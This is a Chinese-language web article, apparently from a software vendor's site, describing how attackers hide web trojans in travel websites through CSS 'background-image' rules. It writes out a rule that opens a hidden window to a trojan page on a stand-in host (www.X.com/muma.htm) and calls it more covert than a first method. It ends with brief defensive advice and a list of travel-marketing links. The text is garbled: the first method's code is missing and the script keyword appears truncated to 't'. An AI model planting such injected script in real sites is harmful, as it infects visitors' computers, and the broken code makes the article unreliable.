當前位置:工程項目OA系統(tǒng) > 領域應用 > 服務OA管理系統(tǒng) > 旅行社管理系統(tǒng)
旅游網(wǎng)站管理系統(tǒng)攻防CSS掛馬實錄
方式1:
Body
“background-image”在CSS中的主要功能是用來定義頁面的背景圖片。這是最典型的CSS掛馬方式,這段惡意代碼主要是通過“background-image”配合t代碼讓網(wǎng)頁木馬悄悄地在用戶的電腦中運行。
那如何將這段CSS惡意代碼掛到正常的網(wǎng)頁中去呢?黑客可以將生成好的網(wǎng)頁木馬放到自己指定的位置,然后將該段惡意代碼寫入掛馬網(wǎng)站的網(wǎng)頁中,或者掛馬網(wǎng)頁所調(diào)用的CSS文件中。
小百科:
使用Body對象元素,主要是為了讓對象不再改變整個網(wǎng)頁文檔的內(nèi)容,通過Body對象的控制,可以將內(nèi)容或者效果控制在指定的大小內(nèi),如同使用DIV對象那樣精確地設置大小。
方式2:
Body
background-image: url(t:open("http://www.X.com/muma.htm","newwindow","border="1" Height=0, Width=0, top=1000, center=0, toolbar=no,menubar=no, scrollbars=no,resizable=no,location=no,status=no"))
方式1的CSS掛馬技術(shù),在運行時會出現(xiàn)空白的頁面,影響網(wǎng)頁訪問者正常的訪問,因此比較容易發(fā)現(xiàn)。不過在方式2中的這段代碼,使用了t的Open開窗,通過新開一個隱藏的窗口,在后臺悄悄地運行新窗口并激活訪問網(wǎng)頁溢出木馬頁面,不會影響訪問者觀看網(wǎng)頁內(nèi)容,因此更加隱蔽。
防網(wǎng)絡服務器被掛馬,通常會出現(xiàn)防病毒軟件告警之類的信息。由于漏洞不斷更新,掛馬種類時刻都在變換,通過客戶端的反映來發(fā)現(xiàn)服務器是否被掛馬往往疏漏較大。正確的做法是經(jīng)常檢查服務器日志,發(fā)現(xiàn)異常信息,經(jīng)常檢查網(wǎng)站代碼,使用網(wǎng)頁木馬檢測系統(tǒng),進行排查。
- 1旅游網(wǎng)站建設規(guī)劃書包含哪些內(nèi)容
- 2河北西柏坡重建紅色旅游區(qū)指日可待
- 3淺析意境流視角下的邊緣型古鎮(zhèn)旅游營銷戰(zhàn)略研究——以芙蓉古鎮(zhèn)為例
- 4什么旅行社管理軟件最好?
- 5網(wǎng)絡旅游營銷新模式之旅游視頻營銷
- 6數(shù)字虛擬景區(qū)—旅游網(wǎng)絡營銷的創(chuàng)新工具
- 7世博下一站——秀水千島湖
- 8旅游網(wǎng)站建設SEO思維結(jié)構(gòu)
- 9旅游營銷經(jīng)濟拉動文化發(fā)展
- 10“海峽旅游銀行卡”——旅游網(wǎng)站建設新嘗試
- 11網(wǎng)站集群的設置。
- 12旅游網(wǎng)站管理系統(tǒng),離島免稅不會影響香港旅游購物
- 13旅行社管理系統(tǒng)的深入分析
- 14旅游網(wǎng)站建設政治環(huán)境及其影響
- 15旅游網(wǎng)站建設的策略
- 16旅游網(wǎng)站管理系統(tǒng),中國旅游日對中國旅游節(jié)的影響
- 17旅游網(wǎng)站模板怎么配色
- 18旅游網(wǎng)站建設的分類
- 19旅游網(wǎng)站制作與IT
- 20旅游網(wǎng)站建設需要選擇營銷策略設計
- 21關(guān)于論壇的策劃。
- 22冬季旅游營銷,從觀念做好
- 23發(fā)展我國旅游業(yè)電子商務的對策
- 24戰(zhàn)略專家 讓任何文化都與人有關(guān)系
- 25旅游網(wǎng)站制作新方法憑借資源優(yōu)勢分享旅游業(yè)高增長
- 26對旅游景區(qū)品牌營銷的思考
- 27進軍電子商旅市場 張家界旅游營銷電子模式
- 28旅游網(wǎng)站如何做好旅游營銷打響知名度
- 29旅游網(wǎng)站管理系統(tǒng)2011年廣州國際旅游展覽會揭幕
- 30旅游營銷有利于提升景區(qū)品牌形象
成都公司:成都市成華區(qū)建設南路160號1層9號
重慶公司:重慶市江北區(qū)紅旗河溝華創(chuàng)商務大廈18樓